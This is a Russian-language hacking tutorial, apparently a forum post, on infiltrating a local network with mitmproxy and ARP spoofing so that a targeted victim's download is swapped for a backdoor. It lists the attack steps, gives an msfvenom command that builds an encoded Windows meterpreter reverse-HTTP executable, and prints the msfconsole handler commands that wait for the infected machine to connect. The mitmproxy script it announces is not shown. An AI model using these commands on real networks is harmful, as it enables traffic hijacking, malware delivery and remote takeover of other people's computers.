инфильтрация сети с помощью MitmProxy / Backdoor Download
Дарова, парни! я покажу вам, как использовать "MitmProxy", и мы запустим скрипт, сделав свой код python для "MitmProxy"
Код Python, который мы напишем, предназначен для устройства в локальной сети, и когда жертва загрузит файл, у него будет бэкдор, который мы сейчас сделаем, и заразим устройство
Общая информация
Mitmproxy представляет собой целый набор программных инструментов, в который входят:
- собственно mitmproxy — интерактивная консольная программа, перехватывающая трафик «на лету»;
- mitmdump — утилита, которую можно описать как аналог tcpdump для протокола HTTP: она перехватывает трафик и сохраняет всю информацию о нем в текстовый файл;
- libmproxy — библиотека для Python, с помощью которой реализуется вся функциональность mitmproxy.
Что мы сегодня сделаем
- 3 - Просканируем гостей,в сети через "Netdiscover или Arp-scan" добавлю от себя Netdiscover сразу показывает имена устройств.
- 4 - Загрузим mitmproxy с Github и внесем изменения
- 5 - Совершим атаку "ArpSpoof" , также можно использовать в Mitmf : Bettercap, Ettercap
- 6- Мы Напишем Необходимые Команды [ Ip Forwarding ]
- 7 - Поднимем наш веб-сервер и выполним "переадресацию портов"
- 8 - мы подготовим наш бэкдор с инструментами , такими как Msfvenom , Veil, TheFatrat
- 9 - MSFConsole мы сделаем наш бэкдор готовым к прослушиванию
- 10 - Мы напишем наш код Python, в редактора "Geany"
- 11 - Перед Запуском Mitmdump мы сделаем переадресации портов
- 12 - MitmDump, мы будем индексировать наш скрипт устройству, который мы выбрали в моем случае это ПК
Ладно перейдем к делу!
Пакеты которые нам нужны
sudo apt-get install dsniff sudo apt install python-pip sudo apt install python3-pip
Прописываем команду arp-scan -l если не знаете на каком айпи сидит ваше устройство советую netdiscover -i
Потом переходим по этой ссылке mitmproxy
Извлекаем в opt,через пару шагов отредактируем этот файл
Теперь мы получим список гостей в нашей сети,и выберем цель которую хотим атаковать
Команда для создания бэкдора
msfvenom -p windows/meterpreter/reverse_http LHOST= LPORT= raw -e x86/shikata_ga_nai -i 7 -f exe -o /root/Desktop/mybackdoor.exe
Открываем Geany,создаем файл и прописываем этот код,после чего сохраняем.
Потом на виртуалке,переходим по ссылке и скачиваеться наш бэкдор
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST
set LPORT
exploit